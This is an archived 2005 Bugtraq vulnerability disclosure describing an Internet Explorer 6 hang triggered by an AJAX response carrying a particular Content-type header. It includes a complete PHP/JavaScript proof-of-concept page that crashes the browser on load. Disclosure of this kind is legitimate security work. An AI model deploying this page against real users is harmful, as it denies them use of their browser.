| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 26 Jul 2005 16:23:01 -0000
From: anakin@...5.pl
To: bugtraq@...urityfocus.com
Subject: Internet Explorer AJAX Bug
Summary:
Internet Explorer 6.0 and below hangs when entering prepared page
Details:
When using AJAX (Asynchronous JavaScript and XML) to load page content dynamicly we are allowed to do anything on the side of server. Internet Explorer process hangs when Content-type header is sent within.
Vulnerable Versions:
Internet Explorer 6.0 and below, tested on Windows XP, 2000 and 2003.
Patches/Workarounds:
Unknown.
Exploits:
Execute the following PHP script in IE to cause it's process to die.
<?php
if (@$_SERVER['QUERY_STRING'] == 'ajax') {
/**
Sending this header causes Internet Explorer to hang.
*/
header('Content-type: text/html; encoding=utf-8');
echo "\n";
exit;
}
?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl">
<head>
<title></title>
<script type="text/javascript">
function pageLoad() {
xmlHttp = false;
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
xmlHttp = false;
}
}
if (!xmlHttp && typeof XMLHttpRequest != 'undefined')
xmlHttp = new XMLHttpRequest();
if (!xmlHttp)
return;
xmlHttp.open("GET", "?ajax", true);
xmlHttp.send(null);
}
</script>
</head>
<body onload="pageLoad()">
</body>
</html>
Discovered by
Łukasz Lach
anakin[at]php5[dot]pl
Powered by blists - more mailing lists